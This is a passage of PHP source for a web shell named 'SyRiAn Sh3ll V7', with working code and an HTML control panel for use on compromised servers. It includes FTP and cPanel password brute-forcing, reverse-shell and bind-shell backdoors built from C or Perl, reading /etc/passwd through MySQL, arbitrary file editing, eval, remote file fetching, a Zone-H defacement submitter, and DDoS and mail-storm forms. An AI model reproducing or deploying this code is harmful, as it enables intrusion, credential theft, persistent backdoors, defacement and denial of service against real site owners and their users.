  1839. $qu_host =$_POST['QU_HOST'];
  1840. $qu_user =$_POST['QU_USER'];
  1841. $qu_pass =$_POST['QU_PASS'];
  1842. $qu_db =$_POST['QU_DB'];
  1843. $query =$_POST['QU'];
  1844. if (empty($_POST['QU_HOST']))
  1845. $qu_host = 'localhost';
  1846. $query = str_replace("\\","",$query);
  1847. if (!empty($_POST['QU']))
  1848. {
  1849. $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
  1850. if(!$tryConnection)
  1851. {
  1852. echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
  1853. }
  1854. else
  1855. {
  1856. $selectDB = @mysql_select_db($qu_db);
  1857. if(!$selectDB)
  1858. {
  1859. echo "[-] Database Name Is Wrong !!";
  1860. }
  1861. else
  1862. {
  1863. $qqok1 = mysql_query($query);
  1864. if(!$qqok1)
  1865. {
  1866. echo "[-] Can't Execute The Query";
  1867. }
  1868. }
  1869. }
  1870. @mysql_close();
  1871. }
  1872. if ($qqok1)
  1873. {
  1874. update();
  1875. }
  1876. }
  1877. # --------------------------
  1878. # SQL Reader
  1879. #---------------------------
  1880. else if ($_POST['sql2Read'])
  1881. {
  1882. $host = $_POST['host'];
  1883. $user = $_POST['user'];
  1884. $pass = $_POST['pass'];
  1885. $db = $_POST['db'];
  1886. $unique = uniqid('N');
  1887. $file = $_POST['file'];
  1888. $file = str_replace('\\\\','\\',$file);
  1889. $query = array(
  1890. "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
  1891. "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
  1892. "SELECT * FROM $unique"
  1893. );
  1894. $connect = mysql_connect($host,$user, $pass);
  1895. mysql_select_db($db,$connect);
  1896. foreach($query as $Allqueries)
  1897. {
  1898. $mysqlQuery = mysql_query($Allqueries,$connect);
  1899. while($line = @mysql_fetch_row($mysqlQuery))
  1900. echo htmlspecialchars($line[0]);
  1901. echo "\n";
  1902. }
  1903. }
  1904. # --------------------------
  1905. # Edit File
  1906. #---------------------------
  1907. else if($_POST['editFileSubmit'])
  1908. {
  1909. $file2Edit = $_POST['editFile'];
  1910. echo @file_get_contents($file2Edit);
  1911. }
  1912. else if($_POST['saveEditedFile'])
  1913. {
  1914. $fileName = $_POST['file2edit'];
  1915. $newFile = $_POST['ExecutionArea'];
  1916. $trytoGenerate = GenerateFile($fileName,$newFile);
  1917. if($trytoGenerate)
  1918. {
  1919. echo "[+] File Saved !";
  1920. }
  1921. else
  1922. {
  1923. echo "[-] Failed To Save File !!";
  1924. }
  1925. }
  1926. # --------------------------
  1927. # Zone H Attacker
  1928. #---------------------------
  1929. else if($_POST['SendNowToZoneH'])
  1930. {
  1931. ob_start();
  1932. $sub = @get_loaded_extensions();
  1933. if(!in_array("curl", $sub))
  1934. {
  1935. die('[-] Curl Is Not Supported !! ');
  1936. }
  1937.  
  1938. $hacker = $_POST['defacer'];
  1939. $method = $_POST['hackmode'];
  1940. $neden = $_POST['reason'];
  1941. $site = $_POST['domain'];
  1942.  
  1943. if (empty($hacker))
  1944. {
  1945. die ("[-] You Must Fill the Attacker name !");
  1946. }
  1947. elseif($method == "--------SELECT--------")
  1948. {
  1949. die("[-] You Must Select The Method !");
  1950. }
  1951. elseif($neden == "--------SELECT--------")
  1952. {
  1953. die("[-] You Must Select The Reason");
  1954. }
  1955. elseif(empty($site))
  1956. {
  1957. die("[-] You Must Inter the Sites List ! ");
  1958. }
  1959. $i = 0;
  1960. $sites = explode("\n", $site);
  1961. while($i < count($sites))
  1962. {
  1963. if(substr($sites[$i], 0, 4) != "http")
  1964. {
  1965. $sites[$i] = "http://".$sites[$i];
  1966. }
  1967. ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  1968. echo "Site : ".$sites[$i]." Defaced !\n";
  1969. ++$i;
  1970. }
  1971. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  1972. }
  1973. # --------------------------
  1974. # FTP And Cpanle Brute Force Attacker
  1975. #---------------------------
  1976. else if($_POST['BruteForceCpanelAndFTP'])
  1977. {
  1978. $connect_timeout=5;
  1979. set_time_limit(0);
  1980. $submit=$_REQUEST['BruteForceCpanelAndFTP'];
  1981. $users=$_REQUEST['users'];
  1982. $pass=$_REQUEST['passwords'];
  1983. $target=$_REQUEST['target'];
  1984. $cracktype=$_REQUEST['cracktype'];
  1985.  
  1986. if(empty($target))
  1987. {
  1988. $target = "localhost";
  1989. }
  1990.  
  1991. function ftp_check($host,$user,$pass,$timeout)
  1992. {
  1993. $ch = curl_init();
  1994. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  1995. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1996. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1997. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1998. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1999. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2000. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2001. $data = curl_exec($ch);
  2002. if ( curl_errno($ch) == 28 )
  2003. {
  2004. print "Error : Connection Timeout Please Check The Target Hostname .";
  2005. exit;
  2006. }
  2007. elseif ( curl_errno($ch) == 0 )
  2008. {
  2009. print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2010. }
  2011. curl_close($ch);
  2012. }
  2013. function cpanel_check($host,$user,$pass,$timeout)
  2014. {
  2015. $ch = curl_init();
  2016. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  2017. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2018. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  2019. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  2020. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2021. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2022. $data = curl_exec($ch);
  2023. if ( curl_errno($ch) == 28 )
  2024. {
  2025. print "[-] Connection Timeout Please Check The Target Hostname .";
  2026. exit;
  2027. }
  2028. elseif ( curl_errno($ch) == 0 )
  2029. {
  2030. print "[+] Cracking Success With Username ($user) and Password ($pass)";
  2031. }
  2032. curl_close($ch);
  2033. }
  2034. if(isset($submit) && !empty($submit))
  2035. {
  2036. if(empty($users) && empty($pass))
  2037. {
  2038. print "[-] Please Check The Users or Password List Entry . . .";
  2039. }
  2040. if(empty($users))
  2041. {
  2042. print "[-] Please Check The Users List Entry . . .";
  2043. }
  2044. if(empty($pass))
  2045. {
  2046. print "[-] Please Check The Password List Entry . . ";
  2047. }
  2048. $userlist=explode("\n",$users);
  2049. $passlist=explode("\n",$pass);
  2050. print "[~]# Cracking Process Started, Please Wait ...";
  2051. foreach ($userlist as $user)
  2052. {
  2053. $pureuser = trim($user);
  2054. foreach ($passlist as $password )
  2055. {
  2056. $purepass = trim($password);
  2057. if($cracktype == "ftp")
  2058. {
  2059. ftp_check($target,$pureuser,$purepass,$connect_timeout);
  2060. }
  2061. if ($cracktype == "cpanel")
  2062. {
  2063. cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  2064. }
  2065. }
  2066. }
  2067. }
  2068. }
  2069. # --------------------------
  2070. # Back Connection
  2071. #---------------------------
  2072. else if($_POST['backconn'])
  2073. {
  2074. if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
  2075. {
  2076. $ip = trim($_POST['ip']);
  2077. $port = trim($_POST['backport']);
  2078. tulis("bcc.c",$back_connect_c);
  2079. Exe('gcc -o bcc bcc.c');
  2080. Exe('chmod 777 bcc');
  2081. @unlink('bcc.c');
  2082. Exe("./bcc ".$ip." ".$port." &");
  2083. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2084. }
  2085. elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
  2086. {
  2087. $ip = trim($_POST['ip']);
  2088. $port = trim($_POST['backport']);
  2089. tulis("bcp",$back_connect);
  2090. Exe("chmod +x bcp");
  2091. $p2=which("perl");
  2092. Exe($p2." bcp ".$ip." ".$port." &");
  2093. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  2094. }
  2095. }
  2096. # --------------------------
  2097. # Bind Connection
  2098. #---------------------------
  2099. else if($_POST['bind'])
  2100. {
  2101. if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  2102. {
  2103. $port = trim($_POST['port']);
  2104. $passwrd = trim($_POST['bind_pass']);
  2105. tulis("bdc.c",$port_bind_bd_c);
  2106. Exe('gcc -o bdc bdc.c');
  2107. Exe('chmod 777 bdc');
  2108. @unlink("bdc.c");
  2109. Exe("./bdc ".$port." ".$passwrd." &");
  2110. $scan = Exe("ps aux");
  2111. if(eregi("./bdc $por",$scan))
  2112. {
  2113. $msg = "Process found running, backdoor setup successfully.";
  2114. }
  2115. else
  2116. {
  2117. $msg = "Process not found running, backdoor not setup successfully.";
  2118. }
  2119. }
  2120.  
  2121. elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  2122. {
  2123. $port = trim($_POST['port']);
  2124. $passwrd = trim($_POST['bind_pass']);
  2125. tulis("bdp",$port_bind_bd_pl);
  2126. Exe("chmod 777 bdp");
  2127. $p2=which("perl");
  2128. Exe($p2." bdp ".$port." &");
  2129. $scan = Exe("ps aux");
  2130. if(eregi("$p2 bdp $port",$scan))
  2131. {
  2132. $msg = "Process found running, backdoor setup successfully.";
  2133. }
  2134. else
  2135. {
  2136. $msg = "Process not found running, backdoor not setup successfully.";
  2137. }
  2138. }
  2139. }
  2140.  
  2141.  
  2142. echo "</textarea>";
  2143. if($_POST['editFileSubmit'])
  2144. {
  2145. echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
  2146. echo "<input type='submit' value='Save' name='saveEditedFile'>";
  2147. }
  2148. echo "</form>
  2149.  
  2150. <!-- Main Table -->
  2151. <table width='100%'><tr>
  2152. <td width='30%' height=30>
  2153. <!-- End Of Main Table -->
  2154. <!-- Commands Alias-->
  2155. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2156. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2157. <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
  2158.  
  2159. name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
  2160. <!-- End Of Commands Alias-->
  2161. </td>
  2162. <td width='30%' height=30>
  2163. <!-- Command Line -->
  2164. <form method='POST'>
  2165. <table width='100%' height='72' border='0' id='Box'><tr>
  2166. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2167. <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
  2168. <input type='text' name='cmd' id='commandLine' value='dir' size=59>
  2169. <input type='text' name='directory' value=".getcwd()." size=59>
  2170. <input name='Execute' id='Execute' type='submit' value='Execute' >
  2171. </td></tr></table></form>
  2172. <!-- End Of Command Line -->
  2173. </td>
  2174. <td width='30%' height=30>
  2175. <!-- Edit File -->
  2176. <form method=POST>
  2177. <table width='100%' height='72' border='0' id='Box'><tr>
  2178. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2179. <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
  2180. <input type='text' name='editFile' size=59>
  2181. <input name='editFileSubmit' type='submit' value='Edit'>
  2182. </td></tr></table></form>
  2183. <!-- End Of Edit File -->
  2184. </td>
  2185. </tr>
  2186. <tr>
  2187. <td width='30%'>
  2188. <!-- Chmod Force -->
  2189. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2190. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2191. <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
  2192. <input type='text' name='fileName' value='index.php' size=48>
  2193. <br/><input type='text' name='per' value='0644' size='10'>
  2194. <input type=submit value='Change Now !' name='changePermission'>
  2195. </td></tr></table></form>
  2196. <!-- End Of Chmod Force -->
  2197. </td>
  2198. <td>
  2199. <!-- Get File -->
  2200. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2201. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2202. <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
  2203. <input type='text' name='fileUrl' size='59' value='http://www.'>
  2204. <select name=getType>
  2205. <option value=wget>wget</option>
  2206. <option value='curl -o'>curl -o</option>
  2207. <option value=get>get</option>
  2208. <option value='lynx -source'>lynx -source</option>
  2209. </select>
  2210. <input name=getFile type=submit value='Get File' >
  2211. </td></tr></table></form>
  2212. <!-- End Of Get File -->
  2213. </td>
  2214. <td>
  2215. <!-- Bind Connection -->
  2216. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2217. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2218. <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
  2219. <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
  2220. <input type='text' name='port' size='26' value='443'>
  2221. <select class='inputz' size='1' name='use'>
  2222. <option value='Perl'>Perl</option><option value='C'>C</option>
  2223. </select>
  2224. <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
  2225. </td></tr></table></form>
  2226. <!-- End Of Bind Connection -->
  2227. </td>
  2228. </tr>
  2229. <tr>
  2230. <td>
  2231. <!-- CGI perl -->
  2232. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2233. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2234. <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
  2235. <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
  2236. <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
  2237. <!-- End Of CGI perl -->
  2238. </td><td>
  2239. <!-- Forbidden -->
  2240. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2241. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2242. <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
  2243. <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
  2244. <select name='403'>
  2245. <option value='DirectoryIndex'>DirectoryIndex</option>
  2246. <option value='HeaderName'>HeaderName</option>
  2247. <option value='TXT'>TXT</option>
  2248. <option value='404'>404</option>
  2249. <option value='ReadmeName'>ReadmeName</option>
  2250. <option value='footerName'>footerName</option>
  2251. </select>
  2252. <input type='submit' value='Generate' name='generateForbidden'>
  2253. </td></tr></table></form>
  2254. <!-- End Of Forbidden -->
  2255. </td>
  2256. <td>
  2257. <!-- Back Connection -->
  2258. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2259. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2260. <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
  2261. <input type='text' name='ip' size='26' value='".GetRealIP()."'>
  2262. <input type='text' name='backport' size='26' value='443'>
  2263. <select name='use'>
  2264. <option value='Perl'>Perl</option>
  2265. <option value='C'>C</option>
  2266. </select>
  2267. <input type='submit' name='backconn' value='Connect'>
  2268. </td></tr></table></form>
  2269. <!-- End Of Back Connection -->
  2270. </td>
  2271. </tr>
  2272. <tr>
  2273. <td>
  2274. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2275. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2276. <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
  2277. <input type='text' name='hashToAnalyze' size=60>
  2278. <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
  2279. </td>
  2280. <td>
  2281. <!-- Eval Code -->
  2282. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2283. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2284. <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
  2285. <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
  2286. <input type=submit name=submitEval value=Eval></td></tr></table></form>
  2287. <!-- End Of Eval Code -->
  2288. </td>
  2289. <td>
  2290. <!-- Users & Domains -->
  2291. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2292. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2293. <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
  2294. <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
  2295. <input type='submit' name='GenerateUsers' Value='Generate'>
  2296. <!-- End Of Users & Domains -->
  2297. </td></tr></table></form>
  2298. </td>
  2299. </tr>
  2300. <tr>
  2301. <td>
  2302. <!-- Reading Files -->
  2303. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2304. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2305. <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
  2306. <input type='text' value='/etc/passwd' name='file' size=35>
  2307. <input class='buttons' type='submit' name='read' value='Read File'>
  2308. <input class='buttons' type='submit' name='show' value='Show directory'>
  2309. </td></tr></table></form>
  2310. <!-- End Of Reading Files -->
  2311. </td>
  2312. <td>
  2313. <!--Encryption -->
  2314. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2315. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2316. <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
  2317. <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
  2318. <input type='submit' value='Encrypt' name='encryptNow'>
  2319. </td></tr></table></form>
  2320. <!-- End Of Encryption -->
  2321. </td>
  2322. <td>
  2323. <!-- Metasploit RC -->
  2324. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2325. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2326. <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
  2327. <input type='text' size='15' name='ip' value='127.0.0.1'>
  2328. <input type='text' size='5' name='port' value='443'>
  2329. <input type='submit' value='Connect' name='metaConnect'>
  2330. </td></tr></table></form>
  2331. <!-- End Of Metasploit RC -->
  2332. </td>
  2333. </tr>
  2334. <tr>
  2335. <td>
  2336. <!-- DDOS Attacker -->
  2337. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2338. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2339. <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
  2340. <input type='text' name='ipToAttack' size='40' value='Target IP'>
  2341. <input type='text' name='portToAttack' size='20' value='Target PORT'>
  2342. <input type='submit' name='StartAttack' value='Attack'>
  2343. </td></tr></table></form>
  2344. <!-- End Of DDOS Attacker -->
  2345. </td>
  2346. <td>
  2347. <!-- Ports Scanner -->
  2348. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2349. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2350. <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
  2351. <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
  2352. </td></tr></table></form>
  2353. <!-- End Of Ports Scanner -->
  2354. </td>
  2355. <td>
  2356. <!-- ACP Finder -->
  2357. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2358. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2359. <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
  2360. <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
  2361. <input type='text' value='.php' name='extention'/>
  2362. <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
  2363. <!-- End Of ACP Finder -->
  2364. </td></tr></table></form>
  2365. </td>
  2366. </tr>
  2367.  
  2368. <tr>
  2369. <br>
  2370. <td valign='top'>
  2371. <!-- Server ShortCut -->
  2372. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2373. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2374. <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
  2375. <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
  2376. <input type='submit' name='generateSER' value=' Generate '>
  2377. </td></tr></table></form>
  2378. <!-- End Of Server ShoutCut -->
  2379. </td>
  2380. <td valign='top'>
  2381. <!-- Fast Tools -->
  2382. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2383. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2384. <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
  2385. <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
  2386. <input type=submit value='Generate php.ini' name='phpiniGenerate'>
  2387. <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
  2388. <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
  2389. <input type='submit' name='showUsers' value='Show Users' />
  2390. </td></tr></table></form>
  2391. <!-- End Of Fast Tools -->
  2392. </td>
  2393. <td valign='TOP'>
  2394. <!-- SQL Reader -->
  2395. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2396. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2397. <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
  2398. <input type='text' value='/etc/passwd' name='file' size='35'><br/>
  2399. <input type='text' name='host' value='127.0.0.1'>
  2400. <input type='text' name='user' value='DB user'>
  2401. <input type='text' name='pass' value='DB pass'>
  2402. <input type=text name='db' value='DB name'>
  2403. <input type='submit' name='sql2Read' value='Read'>
  2404. ";
  2405. if($sql_con)
  2406. {
  2407. echo '<input style="width:300px;" type="text" name="filetoread">
  2408. <input type="submit" value="Read" name="SQLToRead">';
  2409. }
  2410. echo "</td></tr></table></form>
  2411. <!-- End Of SQL Reader -->
  2412. </td>
  2413. </tr>
  2414. <tr>
  2415. <td valign='top'>
  2416. <!-- Mail Storm -->
  2417. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2418. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2419. <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
  2420. <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
  2421. <input type='text' name='to' value='Target Email' >
  2422. <input type='text' size='5' name='nom' value='100'>
  2423. <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
  2424. </td></tr></table></form>
  2425. <!-- End Of Mail Storm -->
  2426. </td>
  2427. <td valign='top'>
  2428. <!-- SQL Query -->
  2429. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2430. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2431. <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
  2432. <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
  2433. <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
  2434. <input type = 'text' name=\&quot;QU_PASS\&quot; value='DB Pass'>
  2435. <input type=text name=\&quot;QU_DB\&quot; value='DB Name' >
  2436. <textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
  2437. <input name='MySQLQuery' type='submit'>
  2438. </td></tr></table></form>
  2439. <!-- SQL Query -->
  2440. </td>
  2441. <td valign='top'>
  2442. <!-- Email Extractor -->
  2443. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2444. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2445. <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
  2446. <input type = 'text' name='EM_HOST' value='127.0.0.1'>
  2447. <input type='text' name='EM_USER' value='DB user'>
  2448. <input type ='text' name='EM_PASS' value='DB pass'>
  2449. <input type='text' name='EM_DB' value='DB name'>
  2450. <input type ='text' name='EM_TABLE' value='users Table'>
  2451. <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
  2452. <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
  2453. <input type='submit' value='?' name='emailExtractorHelp' alt='Email Extractor Help'/>
  2454. </td></tr></table></form>
  2455. <!-- End Of Email Extractor -->
  2456. </td>
  2457. </tr>
  2458. <tr>
  2459. <td valign='top'>
  2460. <!-- Zone-H -->
  2461. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2462. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2463. <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
  2464. echo '<form action="" method="post">
  2465. <input type="text" name="defacer" size="40" value="Attacker" />
  2466. <select name="hackmode">
  2467. <option >--------SELECT--------</option>
  2468. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2469. <option value="2" >undisclosed (new) vulnerability</option>
  2470. <option value="3" >configuration / admin. mistake</option>
  2471. <option value="4" >brute force attack</option>
  2472. <option value="5" >social engineering</option>
  2473. <option value="6" >Web Server intrusion</option>
  2474. <option value="7" >Web Server external module intrusion</option>
  2475. <option value="8" >Mail Server intrusion</option>
  2476. <option value="9" >FTP Server intrusion</option>
  2477. <option value="10" >SSH Server intrusion</option>
  2478. <option value="11" >Telnet Server intrusion</option>
  2479. <option value="12" >RPC Server intrusion</option>
  2480. <option value="13" >Shares misconfiguration</option>
  2481. <option value="14" >Other Server intrusion</option>
  2482. <option value="15" >SQL Injection</option>
  2483. <option value="16" >URL Poisoning</option>
  2484. <option value="17" >File Inclusion</option>
  2485. <option value="18" >Other Web Application bug</option>
  2486. <option value="19" >Remote administrative panel access bruteforcing</option>
  2487. <option value="20" >Remote administrative panel access password guessing</option>
  2488. <option value="21" >Remote administrative panel access social engineering</option>
  2489. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2490. <option value="23" >Access credentials through Man In the Middle attack</option>
  2491. <option value="24" >Remote service password guessing</option>
  2492. <option value="25" >Remote service password bruteforce</option>
  2493. <option value="26" >Rerouting after attacking the Firewall</option>
  2494. <option value="27" >Rerouting after attacking the Router</option>
  2495. <option value="28" >DNS attack through social engineering</option>
  2496. <option value="29" >DNS attack through cache poisoning</option>
  2497. <option value="30" >Not available</option>
  2498. </select>
  2499.  
  2500. <select name="reason">
  2501. <option >--------SELECT--------</option>
  2502. <option value="1" >Heh...just for fun!</option>
  2503. <option value="2" >Revenge against that website</option>
  2504. <option value="3" >Political reasons</option>
  2505. <option value="4" >As a challenge</option>
  2506. <option value="5" >I just want to be the best defacer</option>
  2507. <option value="6" >Patriotism</option>
  2508. <option value="7" >Not available</option>
  2509. </select>
  2510. <textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
  2511. <input type="submit" value="Send Now !" name="SendNowToZoneH" />
  2512. </form>';
  2513. echo "</td></tr></table></form>
  2514. <!-- End Of Zone-H -->
  2515. </td>
  2516. <td valign='top'>
  2517. <!-- Cpanel And FTP BruteForce Attacker -->
  2518. <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
  2519. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2520. <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
  2521. <textarea rows='12' name='users' cols='23' >";
  2522. @system('ls /var/mail');
  2523. echo "</textarea>
  2524. <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
  2525.  
  2526. %^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
  2527. </textarea>
  2528. <input type='text' name='target' size='16' value='127.0.0.1' >
  2529. <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
  2530. <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
  2531. <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' >
  2532. </td></tr></table></form>
  2533. <!-- End Of Cpanel And FTP BruteForce Attacker -->
  2534. </td>
  2535. <td valign='top'>
  2536. <!-- Upload Files -->
  2537. <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0' id='Box'><tr>
  2538. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2539. <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
  2540. <input type=\"file\" name=\"uploadfile[]\">
  2541. <input type=\"file\" name=\"uploadfile[]\">
  2542. <input type=\"file\" name=\"uploadfile[]\">
  2543. <input type=\"file\" name=\"uploadfile[]\">
  2544. <input type=\"file\" name=\"uploadfile[]\">
  2545. <input type=\"file\" name=\"uploadfile[]\">
  2546. <input type=\"file\" name=\"uploadfile[]\">
